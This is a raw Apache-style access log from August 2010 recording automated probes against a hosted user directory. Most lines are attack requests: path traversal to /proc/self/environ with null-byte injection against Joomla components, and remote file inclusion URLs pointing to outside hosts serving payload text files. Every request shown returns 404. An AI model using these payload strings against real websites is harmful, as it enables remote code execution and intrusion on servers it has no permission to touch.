217.195.185.200 - - [02/Aug/2010:07:02:08 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.79" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:02:11 -0700] "GET /~t290/logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.79" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:02:12 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.79" 0 www.hypersurf.com
91.121.78.216 - - [02/Aug/2010:07:03:05 -0700] "POST /~t290/%22Powered HTTP/1.1" 404 299 /home/users/t/t290/public_html/"Powered "-" "MaMa CaSpEr" 0 www.hypersurf.com
91.121.78.216 - - [02/Aug/2010:07:03:05 -0700] "POST /~t290/logs/%22Powered HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/"Powered "-" "MaMa CaSpEr" 0 www.hypersurf.com
91.121.78.216 - - [02/Aug/2010:07:03:05 -0700] "POST /~t290/logs/access.log/%22Powered HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:07:03:37 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:07:03:37 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:07:03:37 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
110.45.144.106 - - [02/Aug/2010:07:03:44 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" 0 www.hypersurf.com
110.45.144.106 - - [02/Aug/2010:07:03:45 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" 0 www.hypersurf.com
87.229.45.28 - - [02/Aug/2010:07:05:49 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
87.229.45.28 - - [02/Aug/2010:07:05:49 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
87.229.45.28 - - [02/Aug/2010:07:05:49 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
180.151.249.166 - - [02/Aug/2010:07:06:19 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" 0 www.hypersurf.com
180.151.249.166 - - [02/Aug/2010:07:06:20 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" 0 www.hypersurf.com
89.108.64.192 - - [02/Aug/2010:07:06:30 -0700] "GET /~t290/logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.812" 0 www.hypersurf.com
89.108.64.192 - - [02/Aug/2010:07:06:32 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "libwww-perl/5.812" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:06:35 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:06:35 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:06:35 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
209.59.147.177 - - [02/Aug/2010:07:10:45 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
209.59.147.177 - - [02/Aug/2010:07:10:45 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
209.59.147.177 - - [02/Aug/2010:07:10:50 -0700] "POST /~t290/logs/access.log.0/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:07:13:10 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:07:13:10 -0700] "POST /~t290/logs/access.log.0/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:07:13:11 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:18:43 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:18:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:18:43 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:18:55 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:18:55 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:18:55 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:19:36 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:19:36 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:19:37 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
200.103.187.57 - - [02/Aug/2010:07:20:38 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
200.103.187.57 - - [02/Aug/2010:07:20:38 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
200.103.187.57 - - [02/Aug/2010:07:20:38 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:20:56 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:20:56 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:07:20:56 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
83.149.110.213 - - [02/Aug/2010:07:24:21 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.805" 0 www.hypersurf.com
83.149.110.213 - - [02/Aug/2010:07:24:22 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.805" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:26:06 -0700] "GET /~t290/logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.79" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:26:10 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.79" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:26:46 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:26:47 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:26:50 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:26:51 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.808" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:27:05 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:27:05 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:27:05 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:07:27:30 -0700] "GET /~t290/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 334 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:07:27:30 -0700] "GET /~t290/logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 339 /home/users/t/t290/public_html/logs/components "-" "Mozilla/5.0" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:07:27:30 -0700] "GET /~t290/logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 350 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:31:27 -0700] "GET /~t290/logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.79" 0 www.hypersurf.com
217.195.185.200 - - [02/Aug/2010:07:31:28 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.79" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:07:32:00 -0700] "GET /~t290/logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 352 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
89.130.250.155 - - [02/Aug/2010:07:32:12 -0700] "GET /~t290/logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.813" 0 www.hypersurf.com
89.130.250.155 - - [02/Aug/2010:07:32:14 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.813" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:07:33:15 -0700] "GET /~t290/logs/access.log.0%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
89.130.250.155 - - [02/Aug/2010:07:33:45 -0700] "GET /~t290/logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.813" 0 www.hypersurf.com
89.130.250.155 - - [02/Aug/2010:07:33:47 -0700] "GET /~t290/logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.813" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:33:57 -0700] "GET /~t290/logs/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:33:57 -0700] "GET /~t290/logs/access.log%20%20/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:33:57 -0700] "GET /~t290/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 310 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:34:18 -0700] "GET /~t290/logs/access.log.0%20%20/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 330 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:37:51 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:37:51 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:38:02 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:38:02 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:38:02 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:38:27 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:38:28 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:38:28 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:41:03 -0700] "GET /~t290/logs/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:41:03 -0700] "GET /~t290/logs/access.log%20%20/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:41:03 -0700] "GET /~t290/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 310 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:07:41:23 -0700] "GET /~t290/logs/access.log.0%20%20/skin/zero_vote/login.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 330 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:42:08 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:42:08 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:07:42:08 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:47:56 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:47:56 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:47:56 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:48:09 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
81.200.59.82 - - [02/Aug/2010:07:48:10 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:50:36 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:07:50:38 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.808" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:07:52:35 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:07:52:35 -0700] "GET /~t290/logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:07:52:35 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
67.195.115.170 - - [02/Aug/2010:07:54:53 -0700] "GET /~t290/logs/Nov02.html HTTP/1.0" 200 14631 /home/users/t/t290/public_html/logs/Nov02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:09 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:09 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:09 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:28 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:28 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
160.79.111.49 - - [02/Aug/2010:07:56:29 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
91.121.92.195 - - [02/Aug/2010:07:58:57 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scanner.fileave.com/feelscanz.txt?? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
91.121.92.195 - - [02/Aug/2010:07:58:57 -0700] "GET /~t290/logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scanner.fileave.com/feelscanz.txt?? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
91.121.92.195 - - [02/Aug/2010:07:58:57 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scanner.fileave.com/feelscanz.txt?? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:00:24 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:00:24 -0700] "GET /~t290/logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:00:24 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:00:35 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:00:37 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:01:25 -0700] "GET /~t290/logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:08:02:07 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
